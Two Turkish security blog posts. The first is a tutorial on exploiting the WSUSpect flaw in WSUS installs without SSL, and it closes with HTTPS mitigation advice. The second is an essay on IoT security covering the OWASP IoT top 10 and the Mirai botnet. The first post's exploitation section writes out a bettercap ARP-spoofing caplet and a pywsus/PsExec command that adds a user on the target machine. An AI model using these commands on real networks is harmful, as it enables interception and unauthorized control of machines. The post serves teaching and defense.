WSUS'un Varsayılan Yapılandırılmasının Sömürülmesi - WSUSpect Zafiyeti 

Yazar: Ekrem Can KÖK

2015'te BlackHat konferansında tanıtılan "WSUSpect" zafiyeti, Windows Update Service (WSUS) ile ilgili bir güvenlik açığı olup, saldırganların bir organizasyonun Windows güncelleme altyapısını hedef alarak kurumsal ağlarını ele geçirmelerine olanak tanımaktadır. Bu yazıda, WSUSpect zafiyetinin teknik detaylarını, bu açığın nasıl sömürüleceğini, bunun için gereken araçları ve bu zafiyetin önüne geçmek için gerekli çözüm yolunu anlatacağız.

WSUSpect Zafiyeti Nedir?

WSUS (Windows Server Update Services), Microsoft'un bir kurumsal ağda istemci makinelerinin Windows güncellemelerini merkezi bir şekilde almasını sağlamak için kullandığı bir yazılımdır. Bu yazılım, kullanıcıların güncellemeleri manuel olarak yüklemelerini engeller ve güvenlik güncellemeleri ile yamaların dağıtımını otomatikleştirir.

WSUS yazılımı ilk kurulumda SSL kurulumunu zorunlu tutmaz o yüzden ilk kurulumda WSUS güncelleme dosyaları için değil, yalnızca meta veriler için SSL kullanımı gerçekleştirir. Burada her güncelleme için bir karma hesaplanır ve meta verilerle birlikte gönderilir. Bir güncelleme indirildiğinde, WSUS dijital imzayı ve karmayı kontrol eder. Güncelleme değiştirilmişse, yüklenmez.

Varsayılan kurulumda SSL zorunlu tutulmadığı için WSUS saldırganlar tarafından kötüye kullanılabilecek bazı güvenlik açıklarını barındırır. WSUSpect zafiyeti, bu güvenlik açıklarını kullanarak saldırganların hedef sistemlere güncelleme gerçekleştirme, kötü amaçlı yazılım veya yama entegre etmelerini sağlar. Böylece saldırgan, hedef makineler üzerinde komut çalıştırma, güncelleme almasını engelleme ve servis dışı bırakma vb. zafiyetleri tetikleyebilir.

WSUS sunucusu başlangıç kurulumunda bırakıldığında SSL yapılandırılması olmadığı için sunucuya SSL sertifika kurulmadan kullanılırsa zafiyete açık hala gelir. Saldırgan ortadaki Adam Saldırısı (MITM) ile araya girerek trafiği dinleyebilir ve isteği şekilde değiştirebilir. Bu sayede kötü amaçlı meta verileri ve istenilen güncelleme dosyası sisteme enjekte edilebilir.

Güncelleme gerçekleştirilirken istemci ve sunucu arasında meta veri paylaşımı yapılır. Bu paylaşım yapılırken SOAP protokolü kullanılır. Saldırgan burada SSL olmamasından kaynaklı MITM saldırısı ile SOAP üzerindeki belirli istekleri değiştirerek. Meta veri doğrulamasının atlatılması ve kendi payload’larının karşı makine üzerinde çalıştırılmasını sağlar.

WSUS yazılımı kullanımında SyncUpdates ve GetExtendedUpdateInfo istekleri ve yanıtları yakalanıp değiştirilerek WSUSpect zafiyeti tetiklenmektedir ve Windows’un güncellemenin doğruluğunu kontrol ettiği meta veri önlemi atlatılabilmektedir. Aşağıda bu isteklere ve yanıtlara ait zafiyetlerin bulunduğu kod blokları verilmiştir.

GetExtendedUpdateInfo Response

CommandLineInstallation

Edited CommandLineInstallation

Yukarıdaki kod blokları incelendiğinde öncelikle “GetExtendedUpdateInfo” isteği iletildiğinde bize yukarıdaki gibi bir kod döndürdüğü gözlemlenmiştir. Burada <FileLocations> tagl’eri arasında belirli bir URL parametresi döndüğü ve xml tagleri arasında ise meta verisinin döndüğü gözlemlenmiştir. MITM işlemi gerçekleştirilerek dönen yanıt üzerindeki değerleri değiştirerek farklı bir URL üzerinden PsExec64.exe dosyasını indirme işlemi gerçekleştirebiliriz.

Daha sonrasında CommandLineInstallation isteği üzerinde <HandlerSpecificData değeri görülmektedir. Burada çalıştırılan exe dosyası diğer resimdeki gibi indirdiğimiz PsExec dosyası çalıştırılacak şekilde düzenlenebilir ve CMD ile bir whoami komutu çalıştırılabilir bu sayede hedef makine üzerinde komut çalıştırma işlemi gerçekleştirilebilir.

Zafiyetin sömürülmesi sırasında burada anlatılan işlemlerin otomatik olarak gerçekleştirilmesi için Python ile kodlanan PyWSUS uygulamasını kullanarak zafiyeti tetikleyeceğiz.

Zafiyetin Sömürülmesi

Zafiyet incelendiğinde Windows’un belirli dosyalarının imzalı olduğu ve çalıştırılabildiği gözlemlenmiştir. Bunlarda bilinenlerde biri CMD diğerleri de SysInternals araçlarıdır. Bunlar kullanılarak makine üzerinde komut çalıştırılabilmektedir.

Zafiyeti tetikleme karşı makinede psexec’i tetikleyerek, çalıştırma işlemi gibi birçok işlemi bizler için PyWSUS yazılımı otomatik olarak gerçekleştirmektedir.

Zafiyet sömürme kısmında da sömürmek için gerekli olan PyWSUS ve Bettercap aracını kullanarak zafiyetin nasıl sömürüleceğini göstereceğiz.

Pywsus aracını PyWSUS adresi üzerinden indirerek kurulumunu gerçekleştirebilirsiniz.

Örnek saldırı senaryosunda;

·        Saldırgan IP: 192.168.1.150

·        Hedef IP: 10.10.10.150

Öncelikle MITM saldırısının düzgün şekilde gerçekleştirebilmek için bettercap uygulamasına bir config dosyası yazılması gerekmektedir. Aşağıdaki şekilde bir wsus.cap dosyası oluşturarak hedef ip adresine gelen tüm trafiği 8530 portu (WSUS uygulamasının varsayılan portu olduğu için kullanılmıştır) üzerinden kendimize yönlendirme işlemi gerçekleştirebiliriz.

wsus.cap

    set arp.spoof.targets 10.10.10.150
    arp.spoof on
    set any.proxy.src_port 8530
    set any.proxy.dst_port 8530
    set any.proxy.dst_address 192.168.1.150

Dosyayı düzenledikten sonra <code>bettercap --iface interface --caplet wsus.cap </code> komutunu çalıştırarak MITM için dinleyici ve yönlendirme işlemini başlatmış oluyoruz. Aynı anda pywsus aracı ile de aşağıdaki komutu çalıştırıyoruz.

<code> python pywsus.py -H 192.168.1.150 -p 8530 -e PsExec64.exe -c ‘/accepteula /s cmd.exe /c “net user btyon btyon /add”‘</code> komutunu da vererek makinemizin 8530 portuna gelen istekleri editleyerek karşı makinede CMD ile komut çalıştırılmasını ve btyon adında bir kullanıcı eklemesini sağlayan kodu gönderiyoruz.

Bu sayede saldırgan makine üzerinde dinleyici ve pywsus yazılımı aktif haldeyken hedef makine üzerinden bir güncelleme işlemi yapılmaya çalışıldığında bizim gönderdiğimiz komut çalıştırılmakta ve makine üzerinde bir kullanıcı oluşturma işlemi gerçekleştirilmektedir.

Önlemler ve Savunma

Bu zafiyeti önlemenin en iyi yolu, WSUS dağıtımları kullanılırken HTTP yerine şifrelenmiş güvenli bir iletişim yöntemi olan HTTPS kullanılmasıdır. WSUS dağıtımı varsayılan ayarlarında yapılandırıldıktan sonra ek olarak SSL yapılandırılmasının da gerçekleştirilmesi gerekmektedir.

Burada SSL/TLS sertifikalarının güvenli şekilde yapılandırılarak zayıf algoritmalar kullanılmamalı ve WSUS’un HTTPS üzerinden iletişim kurması zorunlu hale getirilmelidir.

Teşekkürler,

Nesnelerin İnterneti'nin Güvenliği

Giriş, Teknoloji ve İnternet

“Citius, Altius, Fortius” Latince “Daha hızlı, daha yüksek, daha güçlü” anlamına gelen bu kelimeler, Olimpiyat Oyunlarının sloganıdır. Olimpiyatlar üzerinden bir benzetimde bulunacak olursak bu ilkelere dayalı yarışın sadece spor alanında gerçekleşmediğini söyleyebiliriz. Teknoloji alanındaki gelişmeleri göz önünde bulundurursak tıpkı atletler arasında daha iyiye varmak için bir yarış oluyormuşçasına hayatımızı daha etkili ve etkin kılmaya yarayan ilerlemelere sahne olduğunu görebiliriz.

Belki de içinde bulunduğumuz döneme Bilgi Çağı adını vermemize sebep olan ilerlemelerden biri olan İnternet, ağların belirli protokoller üzerinden birbirine bağlanarak diğer cihazlarla haberleşmesini sağlayan teknoloji, 1960’larda ABD’de Savunma Bakanlığı’nın projesi olarak ilk ortaya çıktığında Dünya üzerindeki nüfusun birkaç katı civarında cihazın bağlantılı olabileceği öngörülebilmiş midir, bilmiyoruz.

Cisco’nun araştırmalarına göre İnternete bağlanan cihaz cihaz sayısı World Wide Web’in (“www”) kullanıma sunulduğu 1991’de 100 milyon, 2003 yılında 500 milyon civarındaydı. Ancak mobil cihazların piyasaya sürülmesinin ardından 2010 yılında ise 12,5 milyara ulaştı. Bu dönemde Dünya nüfusu ise 6,8 milyar insandan oluşmaktaydı. Kısacası, bu araştırmaya göre bağlantılı cihaz sayısının belirtilen dönemde insan nüfusunu geçtiği sonucuna varılabilmektedir. 2020 yılında ise bağlantılı cihaz sayısının 50 milyara ulaşacağı öngörülmektedir.

Nesnelerin İnterneti

Internet of Things (“Nesnelerin İnterneti”) terimi ilk defa 1999 yılında Kevin Ashton tarafından ortaya atıldı. Ashton, bu kavramı fiziksel dünyada birçok yerde bulunan sensörler aracılığıyla sistemlerin İnternet üzerinden bağlantılı olabilmesi durumu için ifade etmiştir. 2000’lerde kullanılan mobil cihaz (dizüstü bilgisayar, akıllı telefon, tablet vb.) sayısındaki artış bu terimin içi dolu, anlamlı hale gelmesini sağladı. Bağlantılı cihaz sayısının ulaştığı seviye ve cihazların kabiliyetleri sebebiyle 2009 yılı Nesnelerin İnterneti teriminin doğduğu yıl olarak kabul görmektedir. Günümüzde Nesnelerin İnterneti çözümleri birçok kişinin hayatını, davranış ve karar alma biçimlerini, sektörlerin ise iş yapış biçimlerini yeniden şekillendirmektedir. Bu çözümler enerji, veri iletim altyapısı ve trafik sistemleriyle akıllı şehirleri, güvenlik, sağlık, iklimlendirme sistemleri vasıtasıyla özel hayatımıza yönelik olabilmektedir. Nesnelerin İnterneti çözümleri yaygın olarak bulunan kablosuz bağlantılar, anlık veri aktarımı üzerinden gerçek zamanlı veri işleme, gömülü sistemlerin ve sensörlerin gelişimi sayesinde evrim geçirerek günümüzdeki halini almıştır.

Nesnelerin İnterneti Üzerine Kaygılar

Gün içinde attığımız adım sayımızı veya gece uyku kalitemizi takip eden bir bileklik, rotamızı optimize etmeye yarayan bir trafik uygulaması ya da çeşitli medyaları izleyebilmek, dinleyebilmek amacıyla kullandığımız akıllı televizyonlar, yani Nesnelerin İnterneti çözümleri etrafımızı çevreleyen her yerdeler, bize kalp atışlarımız kadar yakın konumdalar.

Yarattığı fırsatlar ve kolaylıkların nimetlerinden faydalanıyor olsak da, insanlar Nesnelerin İnterneti’nin oluşturduğu güvenlik ve mahremiyet risklerinden kaygı duymaktadır. İlk Nesnelerin İnterneti çözümleri kameralar kullanılarak halka açık ortamların gözetimini, daha sonra konum tabanlı sistemler sebebiyle dolaylı da olsa gezdiğimiz lokasyonları takip eden ve son olarak evimizin içine kadar giren çözümler aracılığıyla özel hayatımızı dahi izleyebilecek hale gelmiştir. Yaşadığımız zaman diliminde bir diğer teknoloji olan Yapay Zeka’nın da ilerlemesiyle insanların “Biri Bizi Gözetliyor” tarzı bir distopyanın içinde hissedebilmeleri mümkün görünüyor. Kısacası, kaygılar insanların takip edildiği ve gözetlendiği düşüncesine sahip olmalarından, kişisel verilerinin yetkisiz kişiler tarafından amacı dışında kullanılabileceğini düşünmelerinden kaynaklanmaktadır. Bununla birlikte akıllı sistemler ve altyapıların (enerji vb.) bağlantılı olması nedeniyle oluşabilecek kesintilerde hayatımızın orta yerine konumlanmış temel hizmetlere erişememek ve faydalanamamakta bir diğer endişedir.

Uzmanlar, insanların kaygılanmalarına sebep olan bu risklerin Nesnelerin İnterneti’nin gelişim sürecinin yeterli güvenlik standartları ve regülasyonları olmadan yaşanmasına borçlu olduğunu ifade etmektedir. İlke olarak “Secure by Design”, “Privacy by Design” bir ürünün tasarlanması sırasında güvenlik ve mahremiyetin özellik olarak ele alınması gerektiğini anlamına gelir. Birçok Nesnelerin İnterneti çözümünün ortaya çıkış serüvenlerinde bu ilkelerin gözetilmediği yaşanan ihlal olaylarından anlaşılmaktadır.

Nesnelerin İnterneti Zafiyetleri

Nesnelerin İnterneti’ne her geçen gün dâhil olan cihaz sayısının arttığına dayanarak saldırı yüzeyinin de genişlediğini belirtebiliriz. 2014 yılında Nesnelerin İnterneti cihazlarında bulunan en kritik 10 zafiyeti, web uygulamaları güvenliğinde kar amacı gütmeyen bir kuruluş olarak hizmet veren OWASP aşağıdaki şekilde tanımlamıştır.

• I1 Insecure Web Interface (Güvenli olmayan Web Arayüzü)
• Kullanıcı arayüzünün kolaylıkla keşfedilebilir olması
• Ürün kurulumunda kullanılan varsayılan parolaların değiştirilmemesi
• Arayüzün Cross-Site Scripting ve SQL Injection zafiyetleri barındırması

• I2 Insufficient Authentication/Authorization (Yetkisiz Kimliklendirme ve Yetkilendirme)
• Kompleks parola politikasının uygulanmaması
• Kullanıcı hesap bilgilerinin açık metin olarak aktarılması
• Zayıf parola resetleme seçeneklerinin bulunması

• I3 Insecure Network Services (Güvenli olmayan Ağ Servisleri)
• Cihaz üzerinde ihtiyaç duyulmayan açık portların bulunması
• Servis dışı bırakma (DoS) saldırılarına açık olması

• I4 Lack of Transport Encryption (İletimde Şifreleme Eksikliği)
• Verilerin açık metin olarak aktarılması
• Kabul görmüş şifreleme ayarlarının kurulu olması

• I5 Privacy Concerns (Mahremiyet Endişeleri)
• Gereğinden fazla veri toplanması
• Kişisel verilerin saklanması ve iletiminde şifrelemenin kullanılmaması
• Veri saklama politikasının bulunmaması

• I6 Insecure Cloud Interface (Yetersiz Bulut Arayüzü)
• Bulut sistemlerin kolay, tahmin edilebilir parolalara sahip olması
• Bulut sistemlerin arayüzlerinin kolaylıkla keşfedilebilir olması
• Bulut sistemlerin Cross-Site Scripting ve SQL Injection zafiyetleri barındırması

• I7 Insecure Mobile Interface (Yetersiz Mobil Arayüzü)
• Mobil sistemlerin kolay, tahmin edilebilir parolalara sahip olması
• Mobil sistemlerin arayüzlerinin kolaylıkla keşfedilebilir olması
• Mobil sistemlerin Cross-Site Scripting ve SQL Injection zafiyetleri barındırması

• I8 Insufficient Security Configurability (Yetersiz Güvenlik Yapılandırılabilirliği)
• Yönetici ve kullanıcı yetkilendirmelerinin farklı olarak yapılamaması
• Güvenlik kontrollerinin sınırlı olarak değiştirilebilirliği

• I9 Insecure Software/Firmware (Yetersiz Yazılım/Aygıt Yazılımı)
• Güvenlik açıklıkları bulunduğunda güncellenememesi
• Gömülü kullanıcı giriş bilgilerinin bulunması

• I10 Poor Physical Security (Zayıf Fiziksel Güvenlik)
• Cihazların kurcalamaya karşı savunmasız olması
• Portlarının (USB vb.) cihaza kurulum arayüzlerine erişebilmek için kullanılabilmesi

Bir Saldırının Anatomisi

İnternet’e açık bir bilgisayarın saldırganlar tarafından ele geçirildikten sonra uzaktan komutlarla çalıştırılabilmesi sebebiyle bunlara zombi bilgisayar denilmektedir. Zombi bilgisayarların çoğunlukla bir saldırgan ağına bağlı olarak koordineli olarak hareket ettirilerek saldırılarda kullanılması söz konusudur. Bilgisayarların bulunduğu bu ağ, botnet olarak adlandırılmaktadır. Günümüze kadar bilinen en büyük Dağıtık Servis Dışı Bırakma (DDoS) saldırısı bir Nesnelerin İnterneti botnet grubu (“Mirai Botnet”) tarafından 21 Ekim 2016 tarihinde gerçekleşmiştir. Bu botnet grubu, 25 binin üzerinde IP kamera içermekteydi. Saldırganlar kameralara, kurulumdan sonra değiştirilmemiş varsayılan giriş bilgilerini kaba kuvvet (“brute force attack”) saldırısıyla istismar ederek ulaşmışlar ve kontrollerini ele geçirmişlerdir. Dyn adındaki DNS Sunucusuna yapılan kötü niyeti on milyonlarca istek sebebiyle sunucu gelen normal kullanıcılara ait taleplere cevap veremez hale gelmiş ve bir süreliğine servis dışı kalmıştır. ABD’de gerçekleşen bu saldırı sonucunda kullanıcılar birçok Internet devi şirketlerin çevrimiçi hizmetlerine erişememiştir.

Sonuç

İnternet’in ortaya çıkışından itibaren insanlığın bağlantılı olma eğilimi yükselen bir hızla günümüze ulaşmıştır ve önümüzdeki dönemde ivmelenerek devam edeceği öngörülmektedir. Giderek artan bir hızla büyüyen ve hayatımızı şekillendiren teknolojilerden Nesnelerin İnterneti yarattığı faydalarla birlikte risklere de sahiptir. Bu durum madalyonun iki yüzü gibi hem olumlu hem de olumsuz durumların doğmasına sebep olabilir. Nesnelerin İnterneti çözümleri, yaşam döngülerini düzenleyen regülasyonların ve standartların olmaması nedeniyle birçok zafiyete barındırmaktadır. Bu açıklıklar kullanılarak hem özel hem de toplumsal hayatlarımızı ilgilendiren saldırılarla karşılaşılmaktadır.  Nazım Hikmet’ten bir alıntıyla bitirecek olursak, büyük şair 24 Eylül 1945’te yazdığı şiirde “En güzel günlerimiz henüz yaşamadıklarımız” diyordu. Nesnelerin İnterneti hayatımıza getirdiği ve getireceği rahatlıkla en güzel günlerimizi vadediyor. Ancak, diğer taraftan bağlantılı sistemler barındırdıkları zafiyetlerle daha önce görmediğimiz kadar kötü, kâbus dolu günlere de gebe olabilir.